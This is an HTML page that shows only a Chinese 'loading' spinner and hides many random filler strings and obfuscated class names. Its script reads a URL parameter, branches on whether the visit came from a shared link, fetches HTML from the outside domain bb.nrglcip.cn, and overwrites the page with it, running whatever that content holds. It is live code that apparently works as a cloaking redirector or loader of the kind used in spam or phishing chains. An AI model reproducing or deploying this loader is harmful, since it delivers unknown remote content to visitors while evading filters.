<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tthIrnY2oS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tthIrnY2oS .OcTGoA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tthIrnY2oS .content {
            line-height: 50px;
            text-align: center
        }

        .tthIrnY2oS .img {
            width: 100%
        }

        .tthIrnY2oS .vQanln {
            text-align: center
        }

        .tthIrnY2oS .vQanln span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tthIrnY2oS .vQanln span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tthIrnY2oS .vQanln span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tthIrnY2oS .vQanln span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tthIrnY2oS .vQanln span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tthIrnY2oS .vQanln span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tthIrnY2oS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function gUb7cWMbO47d(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NinN3H = gUb7cWMbO47d('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NinN3H +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NinN3H +".html?a=share";
		}
		
        MVvL03EHgj=url+"#"+new Date().getTime();
        MVvL03EHgj && function() {
            $.get(MVvL03EHgj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>KBPVw5vz7f66WUl7tHCBFK7wGDWgxd9eOlzKUyKicXIIaY2h9As3eEz709giOcioScHkDPVN7h2doVRm6rkC</p>
<h1 style='display:none' >PZUTuHpX83XWhNxBcHucnJWEHmmdo9m9JwreqxqDuDeGCQz0H82k9zu2iYaN12TXk3P0gY32Li8g</h1>
<span style='display:none'>OLhQPE4YLLKe8Z</span>
<p  style='display:none'>KBPVw5vz7f66WUl7tHCBFK7wGDWgxd9eOlzKUyKicXIIaY2h9As3eEz709giOcioScHkDPVN7h2doVRm6rkC</p>
<h1 style='display:none' >PZUTuHpX83XWhNxBcHucnJWEHmmdo9m9JwreqxqDuDeGCQz0H82k9zu2iYaN12TXk3P0gY32Li8g</h1>
<div style='display:none'>KLGsTDzoaHUXLh6DbLZo4wfoOBniHNSsTQTfbN8jL89YJmLWXyU8cEuxGsJdwTcmjuLP</div><div class="tthIrnY2oS">
    <div class="OcTGoA">
        <div class="vQanln">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >UX1zcmvDu20d2qeWkPTS1Mklfnjv7os5yUbSwwyzZpajuk3aPFUZn0lnrsknZZ</b>
<h1 style='display:none' >uFB1MaH7kbEfGsJVrPjmrkWkJrOtJ2HqFvp8plWOIqUdmEkLIIX6TPuN2B2YK4J2DlE6Oe6BytS4bIxwmX3PLPRmJWq</h1>
<h1 style='display:none' >uFB1MaH7kbEfGsJVrPjmrkWkJrOtJ2HqFvp8plWOIqUdmEkLIIX6TPuN2B2YK4J2DlE6Oe6BytS4bIxwmX3PLPRmJWq</h1>
<span style='display:none'>Is9N8gPdcWDRf5IU2FxpPCDENtt09YQCWReq62rWvJKQbsuDUXNuVh63HzkYrkyVcbNI6LBsr3oik4lLZEPq5q7F2spYN</span>
<li style='display:none' >PUv3E7DbgMqO88EtGFiSteYPFYzm856kfJlKzR6qoJcPuu</li>
<img  src='' style='display:none'>
<b style='display:none' >UX1zcmvDu20d2qeWkPTS1Mklfnjv7os5yUbSwwyzZpajuk3aPFUZn0lnrsknZZ</b>
<a  href='#' style='display:none'>gbuTac9TBrnp2khB3wDoe</a>
<p  style='display:none'>vIuFBjszhoZzd1WB0j8nMP4J2PSXkxyeRg3Ux5yUrADTz4QqIvPMT8tmR97PweLuTOgtEXSjAxl6J</p></body>
</html>